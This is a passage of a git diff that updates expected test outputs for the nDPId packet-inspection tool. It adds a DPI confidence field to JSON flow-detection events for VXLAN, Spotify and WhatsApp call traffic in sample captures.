+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1639650442645,"flow_last_seen":1639650442645,"flow_idle_time":180000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60887,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1639650442931,"flow_last_seen":1639650443276,"flow_idle_time":180000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":3328,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":40646,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1639650442712,"flow_last_seen":1639650443088,"flow_idle_time":180000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":388,"flow_tot_l4_payload_len":1459,"flow_avg_l4_payload_len":121,"midstream":0,"ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":49762,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1639650443097,"flow_last_seen":1639650443097,"flow_idle_time":180000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60230,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1639650442720,"flow_last_seen":1639650443097,"flow_idle_time":180000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":1454,"flow_tot_l4_payload_len":5058,"flow_avg_l4_payload_len":389,"midstream":0,"ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":60230,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1639650442682,"flow_last_seen":1639650442711,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":43866,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}}
+00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","total-events-serialized":52}
+~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
+~~ packets captured/processed: 127/127
+~~ skipped flows.............: 0
+~~ total layer4 data length..: 79480 bytes
+~~ total detected protocols..: 9
+~~ total active/idle flows...: 9/9
+~~ total timeout flows.......: 0
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+~~ total memory allocated....: 4690441 bytes
+~~ total memory freed........: 4690441 bytes
+~~ total allocations/frees...: 101294/101294
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+~~ json string min len.......: 160 chars
+~~ json string max len.......: 2405 chars
+~~ json string avg len.......: 1352 chars
diff --git a/test/results/wa_video.pcap.out b/test/results/wa_video.pcap.out
index 673996ee1..fc44cb236 100644
--- a/test/results/wa_video.pcap.out
+++ b/test/results/wa_video.pcap.out
@@ -1,30 +1,30 @@
 00440{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"wa_video.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455764448,"flow_last_seen":1561455764448,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455764448,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1561455764448,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1561455764448,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABI0kIAAEARIhLAqAIBwKgC\/+EV4RUANEtUU3BvdFVkcDC64ScQKi2g\/wABAARIlcIDyUSzc\/3fJAksKuG26pMF0apN5Ek="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455764448,"flow_last_seen":1561455764448,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455764448,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455764448,"flow_last_seen":1561455764448,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455764448,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455767339,"flow_last_seen":1561455767339,"flow_idle_time":7440000,"flow_min_l4_payload_len":548,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":548,"flow_avg_l4_payload_len":548,"midstream":1,"ts_msec":1561455767339,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01206{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1561455767339,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"ts_msec":1561455767339,"pkt":"xiwDYGpkkLkxKPrKCABFAAJYAABAAEAGw8bAqAIMnfAUNcDLFGab0R+KLuhMzoAYCAC1GwAAAQEICjTPJUoefmf9AAIh+FvbCnh\/a7IflRY0dljac\/EUrviXyMSuBINQo97GbKMEImMXigVRfinz4XcgTWeXa9giOjhsqf3NxGX9biqY1yfPHcFHJiCc0ZCHvaCNvgkJPVj4efQEO9oXblNeeRaKGRLTNPthw+X05ffa2MEEZsCc5sOdGdAvm7FUBTmDLJxrbHLFDC+Qz785Kp4Y\/nNC9dvuMTiwRIaMjyeDYd66NcNSVYXm4FIuAYawjSGgb9SDZkFGOfhJtHvzWqgQNk\/CQvD5MdFqw4Ro6oaWM5dtaU5byhQ5BGyiSFfIOfXO6utXNWA73iF5EEI1sUrW9Z96Yp1YyVWH1nWO8RF0xmRHhUXi8Z\/sZFez1+bI7zqAvAPYQUokFVSdoHMsl0C7omqMhJPL\/hGc9NtDl21eaiXOM52GOzZWxZMbXJmB\/9+NsouXUZBUgsh9jMSFGZLM23GdBqdyDiy78nD8F4EJr2A\/aUaJIwQnw3GNyvDzKtsy8d2KrzMKlf6d7qvFNf6tCn5YbJzbYCtXcK3bzzVNLm8QIxxktFuE4kwqNUk0pOIUno0bVHsn8uJRI7p6utCiNLoFNA283\/oV8xNqLi4LT4fQ\/\/415n+lAj9aAo0RTNMlYFu4h64\/Lu0dkox1O3c7ouf5f6puZ8pmi+uDZVI\/IU8sc3s7dCFETLgaxg8hmXkWbIHTksRKvfJv3iIyf9m9mqHEEfDnGMuE7VsJzvR+Imk61iI="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1561455767391,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1561455767391,"pkt":"kLkxKPrKxiwDYGpkCABFAAA0cX4AAFMGgWyd8BQ1wKgCDBRmwMsu6EzOm9EhroAQALQFAQAAAQEICh5+dS80zyVK"}
 02353{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1561455767568,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1454,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1454,"pkt_l4_len":1420,"ts_msec":1561455767568,"pkt":"kLkxKPrKxiwDYGpkCABFAAWgcX8AAFMGe\/+d8BQ1wKgCDBRmwMsu6EzOm9EhroAQALSeYwAAAQEICh5+deo0zyVKAAeY92kokkA7hrw6j6Vhkd+oEkvjt9+mUaq3VF5ALR\/3dyTIUqE+ce9A8zw57IwXMUm48Ve04aN2q3aoE1gIxi914RnbSua9WCw4BiKEAwBPqN8fZa53YGzu6KGDd+y61i8hb8APzgCq0BgVHxbqR0bN2PsZSNYDa\/cxDiPbHbN81oUvSJ1gG1HfKBlexobCedzu2sUfK2Qs2a4k4D1FAWNImtONV8L8QIDh9roN6NGgmn\/lqF1FSp0J1KRgd0jLjFjyO8E83j6fNPMnzyDyrqqDONC2kuu2acMixjEUltdGs477N1jzC9n+ER\/b\/S6TQcGEY9qe321iyRfAWuN0DLg7mjzkOAiLNEYzLk5mIXEf0ZRFKJwDAvOVHtFaYq9PK\/+TyWbUbh9dyV6FAMdUFiad1IPXICQYrOxMJpvYW44GNTJj7JJd\/vptPppVq\/RnqviVF+HvVQYCfsL\/SVoCMkJWYQL1ncdQ0eep1cbBr6nAtINm6y3vpk9iSvMUPjyihT4LCr1goaODAyLUwBnoKlcyQnCzrUTIAqAAM29AsZFrK3bZYGCyGW\/1MqA4MzwyfwMD1bF+saAkWfKpa6RSRkk3KGr6n6v79y+8bFqwHEmh79h64wuCdareEkcN59XiCjPB2jxFRkpLZWY0mc91mPUnIxaHkuQIMuo4JPBhS7O2C4sRkwc2EdliToDywQdgKCedjvE+Fkv+IJ1yiEuAY7OC0Yop8Phr2Qm2qT+26YDaaSkP6CBAA8F\/0qtcGuDnlIq3ve6KW\/D6MuF4EOQk1b\/mWeGOhmO2zaJtvFI8PxQT5VxpwG5mTmAHNrmnqHuX0IWL3zCefnedyGujv7ty3zJnVuQwRLy87IaxzKXwsdyDG3gOFStZBZK2qgn8IW\/xr0PRTCCbF58t6+kmge68BzSwUxMSja0zleeuWy9nliB9zaa4b+jN\/22Q56CpjAU0jeotHbt7rfwSgaDBMBcRXkBKkMuSRjHPsILIfuplVXUe9hbVn7Go2YVn3YMI8\/AExe4f\/h8AveIFQCrjpuBYwwenY\/QBLof\/waMaXnDMoOqv3UDo5f\/rUkCJZYja2kE\/3ozUaT8Uz0PCmt\/gc\/KCFNUf0Dg1W5QGc7mNzo6HmKq3sVYeKZxgXc+0B\/+Kg+WdAj0nr4z70bgW5GCi4QLhKZrELaubvCFff0BZt4Ss2ARFEyAH9IKD4jhRLgOIMULFRSu5xrKXDGooBaqIU\/671otysjRrQ81PzcJeLF2eHbj0voj\/+FWKEGjREDnwIqXWvMaPKFe8PlPupWBMwOzFz8pMa1\/Cfixow4NV+SRN1L2CcfmYjYCb8vwd81S0Sbh\/yjs0qpd5YLoB8pMYh\/yUoZ+FIXdWz+sa2pEUMxHkvUFc+7SzHNfV7LJOOBb6vDyxWLEcl4dY0FU+ynkwQS3op34TZEH4GA2VEfQdOgNR2iu4EKt2LFEXckrFDQqafGZhK5SjyixnKMbzvINk8a1d4ltQPewgraMY4ASPPuLS07U5UPA1qlh8E94Xhh8y1zAB0VWBPRDFRutgl1y4BL0Lad98ZYlvDZMJKhfwsfD1K84zCNVytc0lpEdS4WwTmG5jVDNkEok\/lFTqI9CJ\/ndHCOSY1DeCIemKT8q2EgY6ncZJwmIWq3s+IAWyQwqNpA+uXGEPONBjE53SU6ADJ7J2GkLvQbStohFZjKPShMILgTsEvkwNRe5icjnZF5b4X\/JteDZslY73Nte1q4DiPugbpWEOEW3UaXBVcccSnBXfsrY1lsgjH8BpxoTBACfj\/Nm3cIxvIq14OKHRvxy9b0mNen\/kzoDrO5sZ\/dAjHBdNu5W\/9k529dGB7vwkors="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1561455769789,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455769789,"pkt":"xiwDYGpkkLkxKPrKCABFAACaxMYAAEARfZvAqAIMHw1WMNG4DZYAhm0oAAMAaiESpEIMCJFuDJOtHXjqlExAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"}
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1561455769789,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455769789,"pkt":"xiwDYGpkkLkxKPrKCABFAACax74AAEAReqPAqAIMHw1WMNG4DZYAhm0nAAMAaiESpEIMCJFuDJOtHXjqlE1AAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1561455769789,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455769789,"pkt":"xiwDYGpkkLkxKPrKCABFAACaIVsAAEARBNTAqAIMuTzYM9G4DZYAhlDzAAMAaiESpEIMCJFuDJOtHXjqlE5AAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1561455769789,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455769789,"pkt":"xiwDYGpkkLkxKPrKCABFAACa3V0AAEARSNHAqAIMuTzYM9G4DZYAhlDyAAMAaiESpEIMCJFuDJOtHXjqlE9AAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769790,"flow_last_seen":1561455769790,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455769790,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1561455769790,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455769790,"pkt":"xiwDYGpkkLkxKPrKCABFAACaO9gAAEARHKbAqAIMnfDBMNG4DZYAhoNAAAMAaiESpEIMCJFuDJOtHXjqlFBAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769790,"flow_last_seen":1561455769790,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455769790,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769790,"flow_last_seen":1561455769790,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455769790,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00602{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1561455769790,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455769790,"pkt":"xiwDYGpkkLkxKPrKCABFAACaLgUAAEARKnnAqAIMnfDBMNG4DZYAhoM\/AAMAaiESpEIMCJFuDJOtHXjqlFFAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769790,"flow_last_seen":1561455769790,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455769790,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1561455769790,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455769790,"pkt":"xiwDYGpkkLkxKPrKCABFAACab00AAEAR1OTAqAIMszzAMNG4DZYAhm7yAAMAaiESpEIMCJFuDJOtHXjqlFJAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769790,"flow_last_seen":1561455769790,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455769790,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769790,"flow_last_seen":1561455769790,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455769790,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
